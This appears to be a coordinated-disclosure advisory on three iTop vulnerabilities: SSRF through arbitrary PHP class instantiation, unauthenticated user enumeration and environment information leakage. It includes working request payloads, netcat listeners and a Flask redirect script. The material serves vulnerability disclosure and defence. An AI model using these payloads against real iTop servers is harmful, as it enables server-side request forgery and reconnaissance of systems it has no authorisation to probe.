Multiple vulnerabilities on iTop
31/01/2025 - Téléchargement
Product
iTop
Severity
Low
Fixed Version(s)
Affected Version(s)
< 2.7.11, < 3.0.5, < 3.1.2, < 3.2.0
CVE Number
CVE-2024-32870, CVE-2024-51739, CVE-2024-51740
Authors
Description
Presentation
iTop is an application used for ticketing purposes and device management. It offers several levels of privileges, from simple users allowed to create tickets, to application administrators able to configure the application, manage users or devices.
Issue(s)
Multiple vulnerabilities have been identified in iTop, allowing to perform SSRF through arbitrary PHP class instantiation, leak technical information and perform user enumeration. The following advisories were released by iTop:
Timeline
| Date | Description |
|---|---|
| 2024.04.03 | Advisory sent to itop-security@combodo.com |
| 2024.04.12 | iTop acknowledge vulnerabilities |
| 2024.11.04 | Advisories published by iTop |
| 2025.01.31 | Public release |
Technical details
SSRF through arbitrary PHP class instantiation
Description
When iTop receives a form from an authenticated user, several PHP class names (and namespaces) are sent through the HTTP request. In fact, a JSON-encoded payload is sent, containing information about the ticket in the formmanager_data POST parameter:
{
"id":"objectform-ticket-create-660d204f10398",
"transaction_id":"feur-UuIytV",
"formmanager_class":"Combodo\\iTop\\Portal\\Form\\ObjectFormManager",
"formrenderer_class":"Combodo\\iTop\\Renderer\\Bootstrap\\BsFormRenderer",
"formrenderer_endpoint":"/pages/exec.php/object/create/UserRequest?exec_module=itop-portal-base&exec_page=index.php&portal_id=itop-portal","formobject_class":"UserRequest"
}
By replacing the formrenderer_class parameter with Synacktiv, the following error is triggered:
HTTP/1.1 500 Internal Server Error
Content-Length: 277
Content-Type: application/json
{
"exception":null,
"code":500,
"error_title":"Oups ! Une erreur est survenue.",
"error_message":"Attempted to load class \u0022Synacktiv\u0022 from the global namespace.\nDid you forget a \u0022use\u0022 statement?"
}
This means we are able to instantiate any PHP class in the iTop application.
Indeed, in the sources/Form/FormManager.php file, dangerous variable manipulation is performed:
<?php
[...]
$sFormRendererClass = $aJson['formrenderer_class'];
$oFormRenderer = new $sFormRendererClass();
$oFormRenderer->SetEndpoint($aJson['formrenderer_endpoint']);
[...]
?>
This means we are able to instantiate any PHP class respecting the following rules:
- The magic
__constructfunction is not declared. - The magic
__constructfunction is declared but did not take any argument. - The magic
__constructfunction is declared and takes positional parameters.
Several classes complying with these rules can be found. To be exploited, they also have to implement the SetEndpoint method or the magic __call method.
iTop uses GuzzleHttp, which allows performing HTTP request. Therefore, if we send the following modified JSON in the formmanager_data POST parameter:
{
"id":"objectform-ticket-create-660d204f10398",
"transaction_id":"feur-UuIytV",
"formmanager_class":"Combodo\\iTop\\Portal\\Form\\ObjectFormManager",
"formrenderer_class":"GuzzleHttp\\Client",
"formrenderer_endpoint":"http://localhost:4444/"
}
We can observe that a SETENDPOINT HTTP request is received:
$ nc -lnvp 80
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 43762
SETENDPOINT / HTTP/1.1
Host: localhost:80
User-Agent: GuzzleHttp/7
As the SETENDPOINT HTTP verb is not standard, we can create the following python script to perform valid HTTP queries:
from flask import Flask, redirect
app = Flask(__name__)
@app.route('/', methods=['SETENDPOINT'])
def index():
return redirect('http://localhost:8080')
app.run(host='0.0.0.0', port=80)
An HTTP GET request is then received on port 8080:
$ nc -lnvp 8080
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 46176
GET / HTTP/1.1
Host: localhost:8080
User-Agent: GuzzleHttp/7
Impact
This vulnerability can be used to create HTTP requests on behalf of the server, from a low privileged user.
User enumeration
Description
From the webservices/rest.php file, several operations are accessible from an unauthenticated user. One of them is do_reset_pwd, allowing to reset a user password.
This feature can be abused to perform user enumeration. If we perform the following request with a non-existent user:
GET /webservices/rest.php?loginop=do_reset_pwd&auth_user=doesnotexist HTTP/1.1
Host: itop.local
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Combodo-Ajax: true
X-Requested-With: XMLHttpRequest
Origin: http://itop.local
The server answers with the following sentence in the HTTP response:
<h1>Reset password</h1>
<p>
'doesnotexist' is not a valid login
</p>
Impact
This allows unauthenticated users to perform user enumeration, which can make it easier to bruteforce a valid account.
Information disclosure
Description
This vulnerability allows a unauthenticated user to leak information about the running environment of iTop.
By performing the following request :
GET /pages/exec.php?exec_module=itop-hub-connector&exec_page=launch.php&target=inform_after_setup HTTP/1.1
Host: itop.local
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Combodo-Ajax: true
X-Requested-With: XMLHttpRequest
Origin: http://itop.local
The server answers with an HTML page containing environment information in a JSON document:
{
"instance_host":"http://itop.local/",
"application_name":"iTop",
"application_version":"3.1.1-1",
"application_version_full":"iTop version 3.1.1-1-12561 built on 2023-12-19 10:53:23",
"server_stack":{
"os_name":"Linux",
"web_server_name":"apache",
"web_server_version":"Apache/2.4.56 (Debian)",
"database_name":"MySQL",
"database_version":"10.5.23-MariaDB-0+deb11u1",
"database_settings":{
"server":"100523",
"client":"70433",
"max_allowed_packet":"16777216"
},
"php_version":"7.4.33"
}
}
Impact
An attacker can recover information about the remote environment.